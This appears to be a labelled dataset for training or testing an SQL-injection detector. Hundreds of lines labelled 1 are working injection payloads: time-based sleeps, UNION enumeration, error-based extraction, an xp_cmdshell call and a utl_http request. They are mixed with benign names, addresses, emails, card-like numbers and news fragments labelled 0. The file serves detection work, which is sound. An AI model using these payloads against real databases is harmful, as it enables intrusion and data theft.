1'|| ( select 'brde' where 7390 = 7390 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) ||'	1
villanueva de sigena	0
'))) AND SLEEP(5) AND ((('KhlE' LIKE 'KhlE	1
"))/**/As/**/BqSB/**/WHERe/**/4701=4701/**/RLike/**/sLeEp(5)#	1
seliem	0
')/**/As/**/eeuE/**/wHere/**/2692=2692/**/oR/**/sLeeP(5)--/**/aPeU	1
-3130' ) ) ) union all select 2886,2886,2886,2886,2886,2886,2886#	1
Patek , spent almost 10 years run one South-East Asia &apos;s wanted , yesterday sentenced 20 years jail role building explosive devices used bombing	0
")));sELEct/**/CAsE/**/wHeN/**/8800=8800/**/thEN/**/1/**/eLSE/**/nULL/**/ENd--	1
cruz de caravaca, 177	0
plza. antonio mairena, 80,	0
zo	0
-4856' in boolean mode ) union all select 1074,1074,1074,1074,1074,1074,1074#	1
1%' union all select null,null,null,null,null,null,null,null,null--	1
ramanath	0
ildemar	0
05146	0
The residents Bischof-Freundorfer-Weg reported car wrapped toilet paper wheel trims stolen	0
-7345 ) union all select 3866#	1
')) AND 1466=2411#	1
vreugden	0
sldisk	0
rebolledo de la torre	0
297	0
In B Class , two teams Baiersbronn Freudenstadt faced Murgtalhalle Baiersbronn	0
7u4o84z1m07459	0
1" where 2365 = 2365 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --	1
barnhous	0
-4408" ) or 6872 = 6872 and ( "oenu" = "oenu	1
Their party spoken favour privatisation	0
mcwalter	0
%' WAITFOR DELAY '0:0:5' AND 'ZfdR%'='ZfdR	1
select name from syscolumns where id = ( sele ...	1
1' ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( 'sied' = 'sied	1
dordas berttony	0
villalba de los alcores	0
calle puerto de alcolea 185 9-e	0
22496795n	0
Password: -2539') WHERE 8965=8965 OR 5192=5192-- amuS	1
At time , around 40 theology graduates begin vicars	0
33529	0
goth	0
Email: -2536') OR 8196=(SELECT (CASE WHEN (8196=8196) THEN 8196 ELSE (SELECT 1521 UNION SELECT 8706) END))-- MEet	1
1' ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ( 'oacz' = 'oacz	1
-8760 ) where 8277 = 8277 union all select 8277--	1
cariena	0
-8876' ) ) or 3038 = 3038	1
1' ) ) ) or sleep ( 5 ) and ( ( ( 'bmnf' like 'bmnf	1
calle principal 11, 3a	0
1' ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( 'pemj' = 'pemj	1
bould_rhue2@palomajimenez.ru	0
-4329' ) union all select 1353,1353,1353,1353,1353,1353#	1
&quot; At times high road pedestrian traffic , additional set lights required ensure safety , &quot; said Eckert	0
Even though signs talked menstruation , emotionally prepared	0
02210042h	0
4092441841924319	0
) WAITFOR DELAY '0:0:5'--	1
But mice given vaccine &quot; chilled , &quot; say researchers , sign nicotine reached brains	0
confirmar	0
vivaldo	0
attilio	0
-4756" ) ) union all select 6846,6846,6846,6846,6846,6846,6846#	1
%'/**/Or/**/1330=(seleCT/**/coUnT(*)/**/From/**/SYSMASTER:SYSPAGHDR)--	1
bedmar	0
1" and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and "buzb" = "buzb	1
1%' ) ) union all select null,null,null,null,null,null#	1
arsene	0
1" ) ) ) union all select null,null,null,null#	1
')) AS omMJ WHERE 5203=5203 AND 2189=7900#	1
1%" ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #	1
')/**/hAViNg/**/8553=7700/**/ANd/**/('PyvZ'='PyvZ	1
calle correa de arauxo 176	0
' or 1 = 1 or '' = '	1
1' ) union all select null,null,null,null,null,null--	1
')/**/aND/**/SlEEp(5)#	1
yalile	0
' ORDER BY 2479-- enIR	1
b*uba	0
oshea_knowles@tiaherminia.gh	0
5447434200049270	0
&quot; This change future family , &quot; man said	0
antih sacido	0
gregonio	0
));(SELECT * FROM (SELECT(SLEEP(5)))kuIe) AND ((9358=9358	1
' AND SLEEP(5)-- LDRc	1
'))) HAVING 6828=6828 AND ((('ikTi'='ikTi	1
1' ) ) as fwxq where 9935 = 9935 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --	1
select * from users where id = 1 or " ) ]" or 1 = 1 -- 1	1
Email: -9170")/**/ordEr/**/By/**/6823#	1
isel	0
government put , number school-age children suffering food allergies climbs	0
solski9	0
mouchet@007tv.fj	0
Someone German parliament says build German Google	0
nataliya	0
'/**/RLiKE/**/(SElect/**/(cAse/**/WHEn/**/(5715=7500)/**/THeN/**/0x7061737373/**/eLSE/**/0x28/**/ENd))--/**/tmuN	1
1' ) where 4500 = 4500	1
calle cerrada, 94,	0
-5643' ) ) union all select 1515,1515#	1
1 ) where 7425 = 7425 union all select null,null,null,null,null,null,null,null,null,null--	1
select * from generate_series ( 7536,7536,case when ( 7536 = 7523 ) then 1 else 0 end ) limit 1--	1
1%" rlike sleep ( 5 ) #	1
Traditionally , anniversary celebration also always fitting occasion bestow honours	0
keca@autoconstruccion.cu	0
For medical nursing students O &apos;Malley , come United States Europe join Bwelle missions , &apos;s hands-on opportunity &apos;d never get home	0
zambrana	0
calle paloma 101,	0
select * from users where id = 1 or 1#"{ union select 1,version ( ) -- 1	1
/**/ANd/**/(seLECT/**/6380/**/From/**/(seLECT(SLeeP(5)))bnPF)	1
-4954%" ) or 5244 = 4832	1
)/**/aS/**/XgPy/**/whErE/**/5594=5594;SELECt/**/CaSE/**/whEN/**/1973=7189/**/ThEn/**/1/**/ELse/**/nUlL/**/End--	1
`=`emanuel@gmail.com` AND 5486=(SELECT (CASE WHEN (5486=5486) THEN 5486 ELSE (SELECT 3143 UNION SELECT 1729) END))-- NoWQ	1
On occasion Geisingen town anniversary , new chronicle also published	0
'));SeLeCT/**/(Case/**/wHeN/**/(3856=8849)/**/theN/**/3856/**/ElSE/**/3856*(SeLeCT/**/3856/**/FroM/**/INFORMATION_SCHEMA.pLuGinS)/**/End)#	1
godden	0
kuss@inoxled.jobs	0
paseo alameda de osuna 10,	0
leiding@ubuybetter.cat	0
83433277h	0
57186589x	0
montoya	0
2174818451824569	0
' AND 1 = utl_inaddr.get_host_address ( ( SELECT COUNT ( DISTINCT ( USERNAME ) ) FROM SYS.ALL_USERS ) ) AND 'i' = 'i	1
plaza conde de carlet, 40	0
Password: -5506/**/Where/**/6176=6176/**/oR/**/2586=7961--/**/HxPs	1
select * from users where id = '1' or !<@ or 1 = 1 -- 1'	1
farese@bloodline.as	0
franklin	0
Saturday evening saw celebration tenth birthday organisation , already look back impressive results	0
berkhart@joyclub.mh	0
) AS PymA WHERE 9358=9358;DECLARE @FSav NVARCHAR(4000);SET @FSav=(SELECT 'qpzpq'+(SELECT (CASE WHEN (8350=8350) THEN '1' ELSE '0' END))+'qqvjq');EXEC @FSav--	1
")/**/aS/**/TpZE/**/whERE/**/2882=2882;sElECT/**/pg_slEEp(5)--	1
tengroth@academiaversal.md	0
music jaume isern 189	0
-6017 union all select 8449,8449,8449--	1
`=`passs`;sELect/**/SLEEp(5)/**/And/**/`passs`=`passs	1
Dick considered American prophet , certainly highly esteemed within native country	0
1'+ ( select 'hcqf' where 9956 = 9956 and ( 2993 = 4297 ) *4297 ) +'	1
declare @s varchar ( 200 ) select @s = 0x73656c65637420404076657273696f6e exec ( @s )	1
segart	0
3182733189788703	0
1 ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 6829 = 6829	1
(2005) integrate prosodic features (pitch, pause duration, etc	0
barbalos	0
suspen3edo7	0
r14orsi1a	0
roco del valle	0
1'|| ( select 'tznb' from dual where 8808 = 8808 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #	1
c/ linajes 178 9?f	0
1%' ) ) ) union all select null,null--	1
1%' order by 1--	1
boget brufau	0
5756	0
3376121794389360	0
-4980" or ( 8459 = 8459 ) *4906 and "mnlj" like "mnlj	1
holloway_brandenburg@bijoubijoudiferente.hu	0
8049477483692914	0
16154	0
coray@ciaplast.ir	0
1 ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #	1
chmara@novolardiseno.ky	0
c/ almenas 98 5?f	0
ekezian-wohlfeiler@cirugiaalbeiteria.lv	0
Email: -1410)/**/aS/**/hUxU/**/wHEre/**/7560=7560/**/oR/**/5644=(SELEcT/**/(CaSE/**/wHEN/**/(5644=8383)/**/thEn/**/5644/**/ELse/**/(SELEcT/**/8383/**/unIoN/**/SELEcT/**/6820)/**/ENd))--/**/EOXM	1
iif ( 4836 = 1823,1,1/0 )	1
1' ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --	1
-2625' ) or elt ( 1032 = 1032,3623 ) and ( 'eliy' = 'eliy	1
tcito	0
57970346l	0
4870628613160341	0
, 2006; Favre et al	0
-1844" where 7948 = 7948 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --	1
c/ de la riera d'horta 105, 5?h	0
madhim	0
ruhl.friedkin@opel-e-flex.in	0
Not yet school months taking first steps , toddler pet Shetland pony Toffee trotted three rounds ease take top prize - leaving 30 adult opponents trailing behind	0
1" ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --	1
7159	0
marlowe	0
frailes	0
)/**/rliKE/**/(seLect/**/(cASE/**/wHen/**/(5659=6524)/**/THen/**/0x656d616e75656c40676d61696c2e636f6d/**/ElsE/**/0x28/**/eNd))--/**/OKZN	1
");SELECT CASE WHEN 3200=3200 THEN 1 ELSE NULL END--	1
1 ) where 8856 = 8856 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --	1
6e0turer2	0
@variable	1
Senator Chris Murphy Connecticut said spoke European Parliament members others week concerned threats stop participating anti-terrorist organizations frustration surveillance National Security Agency	0
%'/**/rLiKE/**/SLeEp(5)#	1
-9698 ) as pvhn where 3223 = 3223 or elt ( 6563 = 9210,9210 ) --	1
Parents Georgia teen died &apos; freak accident &apos; believe son murdered The parents Georgia teenager , whose body found inside rolled-up wrestling mat high school gym , believe son murdered , family &apos;s attorney said Thursday	0
picsearch	0
`)/**/whErE/**/7346=7346/**/anD/**/7335=7335	1
));WAITFOR/**/DELAY/**/'0:0:5'/**/aND/**/((7520=7520	1
"/**/wheRe/**/1509=1509/**/RLiKE/**/(SELeCt/**/2726/**/FROm/**/(SELeCt(SlEep(5)))sYqr)--/**/mzpF	1
89393853y	0
Frontier gone furthest area , though	0
") AND 4560=7172#	1
06673981w	0
gruart ola	0
or '' = '	1
'))) ORDER BY 2581-- xJkI	1
parke antonio trueba 175	0
Email: (CASE WHEN (8727=2852) THEN 8727 ELSE 8727*(SELECT 8727 FROM DUAL UNION SELECT 2852 FROM DUAL) END)	1
Email: -7958")) OR 8639=8480-- ZVlH	1
siles pinyol	0
pawley@santacruzdelvoto.vu	0
")))/**/aND/**/6017=(seLeCt/**/COuNT(*)/**/fROM/**/SYSMASTER:SYSPAGHDR)/**/aND/**/((("xOjY"/**/lIKe/**/"xOjY	1
)/**/WAITFOR/**/DELAY/**/'0:0:5'/**/AnD/**/(1200=1200	1
select * from users where id = 1 or ",?" or 1 = 1 -- 1	1
1\'1	1
-5820' ) ) as lkik where 4044 = 4044 or 7156 = 9197--	1
-9315' ) ) ) union all select 5057,5057,5057,5057,5057#	1
Password: -8781))/**/aS/**/NnhP/**/WHeRE/**/9820=9820/**/Or/**/8632=8350#	1
-2102' where 3644 = 3644 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --	1
";SELECT SLEEP(5)#	1
to_timestamp_tz	1
irureta kosiner	0
prat de llobregat, el	0
escocia 197	0
1%' ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( '%' = '	1
c/ bailen 8,	0
bujaraloz	0
';SELECT SLEEP(5) AND 'ePtJ'='ePtJ	1
etreros 8 13a	0
bertra canamasa	0
1%' ) ) union all select null,null,null--	1
select * from users where id = 1.*\ union select null,@@VERSION -- 1	1
Consequently , particularly motivated playing former coach	0
So shortly birth 1976 , Bruce &apos;s external organ testes surgically removed raised girl	0
1' ) ) union all select null,null,null,null--	1
Email: -9574"/**/WheRe/**/7292=7292/**/Or/**/8201=9082--/**/pGtX	1
avda. somosaguas 150, 1?b	0
98993276b	0
' AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 5 ) ) AND 'i' = 'i	1
')));SELECT (CASE WHEN (3811=3811) THEN 3811 ELSE 1/(SELECT 0) END)--	1
2145088995876898	0
1 where 4785 = 4785 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --	1
select * from users where id = 1.%@ union select 1,version ( ) -- 1	1
This reported broadcaster SABC	0
Password: -1887')/**/Or/**/8806=5439/**/aNd/**/('MVIv'='MVIv	1
During speech , images trips shown large screen , order give guests anniversary event insight initiatives mentioned	0
28900	0
));SELECT CASE WHEN 4914=7406 THEN 1 ELSE NULL END--	1
trixy	0
It cannot explain National Security Agency collect data private lives Americans , prosecuting whistle-blowers reveal government wrongdoing	0
-3884" where 8012 = 8012 union all select 8012,8012#	1
-8349 ) union all select 8126,8126#	1
`)/**/WherE/**/6103=6103;SelECT/**/caSE/**/When/**/2730=2091/**/theN/**/1/**/ElSE/**/Null/**/enD--	1
1" ) ) ) order by 1#	1
1" ) ) as xxdm where 4818 = 4818	1
montaa baltans	0
Over recent months confirmed , direction Deacon Reiner Dehner assistance several church members , preparing special day	0
4122797587162941	0
1' where 9416 = 9416	1
)))/**/ORder/**/By/**/1533--/**/KhAL	1
trampeador	0
S	0
select * from users where id = 1 or \<1 union select 1,@@VERSION -- 1	1
c/ nuestra seora de la merced s/n	0
But mice given vaccine &quot; chilled , &quot; say researchers , sign nicotine reached brains	0
1%' ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( '%' = '	1
')) AS sguF WHERE 3664=3664;IF(2737=7987) SELECT 2737 ELSE DROP FUNCTION gEuA--	1
"))/**/Or/**/3757=(SeLECt/**/3757/**/FRoM/**/PG_SlEeP(5))/**/And/**/(("unXQ"/**/Like/**/"unXQ	1
-1033 union all select 8731,8731,8731,8731,8731,8731--	1
-9583%" ) ) union all select 9349,9349,9349,9349,9349,9349,9349--	1
44394	0
Endurance pays dividends Six teams battled become champion club tennis tournament	0
1" ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( ( "cowu" like "cowu	1
A member security staff also killed	0
" or "" "	1
natiuk	0
select * from users where id = 1 or ". ( " or 1 = 1 -- 1	1
di7a?g7r	0
1" where 1809 = 1809 and make_set ( 8403 = 8403,8899 ) --	1
1055239425022881	0
valvular	0
1' where 4358 = 4358 union all select null,null,null,null--	1
-5644" ) ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ( "evcf" = "evcf	1
daviu callarisa	0
-8187' ) ) ) or 1698 = 2823#	1
estornin3	0
select * from users where id = 1 <@ or 1 = 1 -- 1	1
2368	0
') WHERE 3981=3981 RLIKE SLEEP(5)-- XBIB	1
'));SELECT (CASE WHEN (2315=2315) THEN 1 ELSE 2315*(SELECT 2315 UNION ALL SELECT 9318) END)--	1
7094785480687274	0
morande	0
desaplomar	0
02600	0
santa colomba de somoza	0
1 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) -- kegk	1
piette	0
pereira	0
carrer felix cucurull, 167 3-a	0
946	0
castroverde	0
1' where 7882 = 7882 and 6663 = 4524--	1
1 where 7516 = 7516 union all select null#	1
1'+ ( select aahc where 5436 = 5436 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) ) +'	1
'||utl_http.request ( 'httP://192.168.1.1/' ) ||'	1
siu-ling	0
1" ) ) ) union all select null,null,null,null,null,null,null,null,null--	1
select * from users where id = 1 or "%_" or 1 = 1 -- 1	1
-1598 ) ) ) union all select 9418,9418,9418,9418,9418,9418,9418#	1
wever ribot	0
3051	0
-5245' or elt ( 1032 = 1032,3623 ) and 'qfvo' = 'qfvo	1
46529	0
3260901599339838	0
")/**/As/**/bmBZ/**/whERE/**/8076=8076/**/anD/**/5319=(seleCt/**/CounT(*)/**/FRom/**/SYSMAsTER:SYSPAGHDR)--	1
romilda	0
tamerlani@ubikuo.cc	0
'; exec master..xp_cmdshell 'ping 172.10.1.255'--	1
-5202 union all select 5332,5332,5332,5332,5332,5332,5332#	1
1 ) where 5651 = 5651	1
sureda fuertes	0
select * from users where id = 1 -@<@ union select 1,version ( ) -- 1	1
select * from users where id = 1 or 1<@ = 1 union select 1,version ( ) -- 1	1
7910538337072686	0
cosme	0
sertino	0
cartaya	0
san vicente de la barquera	0
nuda drudes	0
1 ) as wshv where 5684 = 5684	1
Email: -8201") AS VSOe WHERE 6265=6265 ORDER BY 6281-- Ptbf	1
%' RLIKE SLEEP(5) AND 'UvDL%'='UvDL	1
select * from users where id = 1.%@ or 1 = 1 -- 1	1
delila	0
15553	0
1 where 4153 = 4153 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --	1
' or 1 = 1	1
1%" ) ) union all select null,null,null,null,null,null,null,null#	1
')/**/WheRE/**/8676=8676/**/Or/**/(SelecT/**/5652/**/froM/**/(SelecT(SlEEP(5)))TIIA)--/**/JIiZ	1
1 union all select null,null,null,null,null,null,null,null,null--	1
segura reygadas	0
Email: -1384"))) OR 2860=2860 AND ((("xoDh"="xoDh	1
1" ) where 6138 = 6138 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --	1
1%' union all select null,null,null,null,null,null,null,null#	1
49449729m	0
5 metres accommodate oncoming traffic	0
34112	0
&quot; New voices love sing welcome time , &quot; said Schlotmann	0
, thermometer still reading 25 degrees	0
10411	0
vitacco	0
1" and 1668 = 8288	1
fandio berzal	0
ermina	0
maeya	0
')) AS qSEj WHERE 2013=2013 OR NOT 2909=5603-- KcAF	1
'))/**/oR/**/3757=(SELect/**/3757/**/fROM/**/Pg_sLEEP(5))/**/ANd/**/(('zjyg'/**/LikE/**/'zjyg	1
bizarro	0
1'|| ( select 'wadx' where 4287 = 4287 or sleep ( 5 ) #	1
select * from users where id = 1 + \+*$ union select null,@@VERSION -- 1	1
'+(SELEcT/**/LKZw/**/wHerE/**/1224=1224/**/And/**/6847=7667)+'	1
-5580 or 4829 = 1968	1
calle salvatierra 196,	0
;SELECT PG_SLEEP(5)	1
1%' ) ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( '%' = '	1
rolando	0
)))/**/oR/**/(SELeCt/**/2155/**/frOm/**/(SELeCt(SlEEP(5)))XQGM)#	1
";SELECt/**/(cASe/**/wHen/**/(1575=8781)/**/THEn/**/1/**/elSe/**/1575*(SELECt/**/1575/**/unioN/**/AlL/**/SELECt/**/8781)/**/eND)--	1
rivalee	0
1" where 7249 = 7249 union all select null,null,null,null,null,null,null,null,null,null--	1
brinton2@tartasconamor.lr	0
gilan@escarba.fk	0
'))/**/anD/**/7048=(SelEct/**/7048/**/FRoM/**/pG_SLeEP(5))--	1
osteicoechea uslet	0
)/**/anD/**/4365=5609	1
Created overseen Caroline Hirsch , founder standup institution Carolines , festival celebrates tenth anniversary year , sixty shows small clubs large theatres	0
'/**/aNd/**/3116=(SeleCT/**/3116/**/FROm/**/PG_SleEP(5))/**/aNd/**/'KPfh'/**/LIkE/**/'KPfh	1
todd	0
select * from users where id = 1 or " ) {" or 1 = 1 -- 1	1
masini	0
praza madre lestonnac, s/n	0
"/**/RlikE/**/(SeleCT/**/2866/**/FROm/**/(SeleCT(slEep(5)))AaQJ)#	1
One conduct transition actions parsing followed punctuation predictions cascaded way	0
22147	0
9370319487845203	0
68035116n	0
ephrayim	0
gladstei	0
1 where 6494 = 6494 and 8463 = 2760	1
hinojosa, la	0
terl6z	0
") AS urst WHERE 5529=5529;(SELECT * FROM (SELECT(SLEEP(5)))TCOY)#	1
1 ) and ( 3020 = 3020 ) *6703 and ( 9831 = 9831	1
lesmeris	0
ardevol herrador	0
1" ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( "kkim" = "kkim	1
1813799559056744	0
" OR 4357=(SELECT 4357 FROM PG_SLEEP(5))--	1
1' ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( 'ireg' like 'ireg	1
When fire service arrived , flames already bursting window	0
m6l25eo	0
True , Strathclyde paper pointed possible economic benefits freer movement rest Europe , though - predictably - figure headlines	0
jado	0
1" ) ) ) union all select null,null,null,null,null,null,null,null,null,null--	1
hua	0
8185948553220105	0
1" ) ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ( "sdvu" like "sdvu	1
) AS bTFj WHERE 5651=5651;SELECT CASE WHEN 7845=4008 THEN 1 ELSE NULL END--	1
';seLECT/**/pg_SlEEP(5)/**/aNd/**/'GIKL'='GIKL	1
9990220996322149	0
After short time managed find first person direct building	0
select * from users where id = 1 or "{1" = 1 or 1 = 1 -- 1	1
atanasio	0
digott_sims@enigmatico.ar	0
1' ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #	1
1%' and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --	1
calle brasil 185, 11f	0
pasaje santo angel, 190,	0
villaturiel	0
1' ) as viex where 6242 = 6242 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --	1
call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 8503 = 8503	1
He suffered serious injuries taken &quot; Christophorus 6 &quot; rescue helicopter Salzburg Regional Hospital	0
-9078 union all select 3779,3779,3779,3779,3779,3779,3779,3779--	1
07160844r	0
los halcones 160,	0
Ample supplies crude weighed price recent weeks	0
tuffo	0
men3pea	0
Other findings support conclusion , many contributing factors	0
oxley@muevetuweb.lb	0
` WHERE 9256=9256;WAITFOR DELAY '0:0:5'-- Wvfr	1
" ORDER BY 3865#	1
narendra	0
05130	0
-2920' ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'rzey' = 'rzey	1
A deed drafted Kirchen , towns mentioned	0
1" ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( ( "djwo" = "djwo	1
An additional radar sensor checks whether green phase pedestrian ended	0
28343275f	0
&apos; It &apos;s five years later , Mr	0
-7293' ) ) ) or 3038 = 3038	1
1631	0
1 ) union all select null,null,null,null--	1
What I must concerns me, people think	0
germain@elcorteitaliano.cat	0
gancedo	0
&quot; Eighteen inches seat width would great passengers , reality business point Airbus proposal driven threat 777 , &quot; said cabin interiors expert Mary Kirby , founder editor Runway Girl Network	0
port	0
c/ en sala, 163	0
I wish please him; I wish wish please me	0
The Department Education due release new syllabuses English maths tomorrow - first subjects undergo radical overhaul	0
In case question , driver ignored light permanently red around three minutes held responsible negligently jumping red light	0
rexach donada	0
tamer	0
)/**/aND/**/slEep(5)/**/aND/**/(4937=4937	1
nazareth	0
cruey	0
ja.har	0
kumushalieva@hiperbarcelona.ly	0
6285982305475025	0
27001	0
/**/haviNg/**/6985=1870--/**/BsjQ	1
Email: -5932')) AS ySSn WHERE 3375=3375 ORDER BY 4619-- qGUs	1
")/**/hAvINg/**/6135=5870/**/aNd/**/("TOBs"="TOBs	1
Email: -5964')) AS uBzt WHERE 5028=5028 OR 7380=9364	1
gowens	0
angelika	0
serrano	0
3242091278649247	0
The target &quot; missiles related equipment &quot; , Israeli government feared intended Lebanese Hezbollah , according CNN	0
17115248m	0
Email: -3462))/**/aS/**/jsgh/**/wHERE/**/1232=1232/**/oR/**/1127=(selEct/**/(CaSE/**/wHEN/**/(1127=1127)/**/tHen/**/1127/**/ELse/**/(selEct/**/2152/**/uniON/**/selEct/**/4061)/**/End))--/**/VLEl	1
henckels@easyviaggio.tr	0
fortet esquer	0
select * from users where id = 1 or " ) ;" or 1 = 1 -- 1	1
carteado	0
or 1 = 1	1
c/ sarasate 143	0
koleskidy@manjarr.ps	0
-7610' or 3038 = 3038	1
1 ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #	1
18vi5i9ad	0
83154874f	0
Password: -1923)))/**/Or/**/3143=3143	1
Email: -2854))/**/aS/**/wpbs/**/wHeRE/**/7517=7517/**/Order/**/By/**/3898--/**/cqCI	1
1' ) ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( 'nqam' = 'nqam	1
1 ) and 7533 = 7533 and ( 7175 = 7175	1
1' ) ) as kfnt where 8090 = 8090 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --	1
lamphier	0
1 ) as obzn where 7652 = 7652 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --	1
1" ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( "kldp" like "kldp	1
1' ) where 9175 = 9175	1
sant quirze del valls	0
select pg_sleep ( 5 ) and "zhsc" = "zhsc	1
' AND 6803=(SELECT (CASE WHEN (6803=6258) THEN 6803 ELSE (SELECT 6258 UNION SELECT 2950) END))-- IFPx	1
22533	0
1', ( select ( case when ( 5154 = 5154 ) then 1 else 5154* ( select 5154 from master..sysdatabases ) end ) )	1
call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) -- rucf	1
0345951332248071	0
26135	0
select * from users where id = 1 or \.<1 or 1 = 1 -- 1	1
Email: -2091) AS mcxe WHERE 3362=3362 OR 2591 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2591=2591) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113)))-- vTJb	1
1" where 1234 = 1234	1
80	0
31253	0
select * from users where id = '1' union select ( \ ) ,@@VERSION -- 1'	1
2olt	0
0381793087157958	0
Email: -7271/**/oR/**/1127=(sEleCt/**/(CASe/**/wHen/**/(1127=1127)/**/ThEn/**/1127/**/eLse/**/(sEleCt/**/2152/**/UnIon/**/sEleCt/**/4061)/**/eNd))--/**/wVQT	1
1 where 7452 = 7452 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --	1
Email: -3890"/**/oR/**/8776=5634/**/aNd/**/"SqUh"/**/LIke/**/"SqUh	1
) WHERE 8516=8516 OR NOT 5463=5463-- nPtm	1
